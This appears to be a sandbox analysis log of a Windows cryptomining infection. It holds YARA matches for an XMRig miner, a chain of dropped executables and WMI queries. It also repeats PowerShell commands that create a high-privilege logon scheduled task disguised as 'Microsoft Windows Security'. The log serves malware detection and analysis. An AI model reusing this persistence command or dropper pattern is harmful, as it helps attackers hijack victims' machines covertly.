Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: 2779421088.exe, 00000009.00000000.1591959600.0000000000F89000.00000002.00000001.01000000.0000000B.sdmp, 2779421088.exe, 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
Source: 2779421088.exe, 00000009.00000000.1591959600.0000000000F89000.00000002.00000001.01000000.0000000B.sdmp, 2779421088.exe, 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@66/62@3/81

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

Code function: 4_2_00406BC0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,

4_2_00406BC0

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

Code function: 4_2_00406460 CoInitialize,CoCreateInstance,wsprintfW,

4_2_00406460

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Mutant created: \Sessions\1\BaseNamedObjects\hh6657577447
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2096:120:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-1f96af2f-fdf5-b0fa4a-ee59e54ff93d}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:2744:120:WilError_03
Source: C:\Windows\System32\dwm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\vljmdnomkxppwbqz
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5444
Source: C:\Windows\sysnldcvmr.exe	Mutant created: \Sessions\1\BaseNamedObjects\753f85d83d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1852

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe

File created: C:\Users\user\AppData\Local\Temp\34D7.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\640832494.exe

Command line argument: hh6657577447

13_2_001D1F60

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: f5TWdT5EAc.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe

File read: C:\Users\user\Desktop\f5TWdT5EAc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\f5TWdT5EAc.exe "C:\Users\user\Desktop\f5TWdT5EAc.exe"
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Process created: C:\Users\user\AppData\Local\Temp\34D7.exe "C:\Users\user\AppData\Local\Temp\34D7.exe"
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Process created: C:\Users\user\AppData\Local\Temp\896429707.exe C:\Users\user\AppData\Local\Temp\896429707.exe
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Process created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exe
Source: unknown	Process created: C:\Windows\sysnldcvmr.exe "C:\Windows\sysnldcvmr.exe"
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\1171111125.exe C:\Users\user\AppData\Local\Temp\1171111125.exe
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Process created: C:\Users\user\AppData\Local\Temp\2779421088.exe C:\Users\user\AppData\Local\Temp\2779421088.exe
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\78476062.exe C:\Users\user\AppData\Local\Temp\78476062.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\640832494.exe C:\Users\user\AppData\Local\Temp\640832494.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
Source: C:\Windows\System32\fontdrvhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Process created: C:\Users\user\AppData\Local\Temp\2688734187.exe C:\Users\user\AppData\Local\Temp\2688734187.exe
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\1657630034.exe C:\Users\user\AppData\Local\Temp\1657630034.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\2910625892.exe C:\Users\user\AppData\Local\Temp\2910625892.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
Source: unknown	Process created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Process created: C:\Users\user\AppData\Local\Temp\34D7.exe "C:\Users\user\AppData\Local\Temp\34D7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Process created: C:\Users\user\AppData\Local\Temp\896429707.exe C:\Users\user\AppData\Local\Temp\896429707.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Process created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exe	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\1171111125.exe C:\Users\user\AppData\Local\Temp\1171111125.exe	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\78476062.exe C:\Users\user\AppData\Local\Temp\78476062.exe	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\640832494.exe C:\Users\user\AppData\Local\Temp\640832494.exe	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\1657630034.exe C:\Users\user\AppData\Local\Temp\1657630034.exe	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Process created: C:\Users\user\AppData\Local\Temp\2910625892.exe C:\Users\user\AppData\Local\Temp\2910625892.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Process created: C:\Users\user\AppData\Local\Temp\2779421088.exe C:\Users\user\AppData\Local\Temp\2779421088.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Process created: C:\Users\user\AppData\Local\Temp\2688734187.exe C:\Users\user\AppData\Local\Temp\2688734187.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown
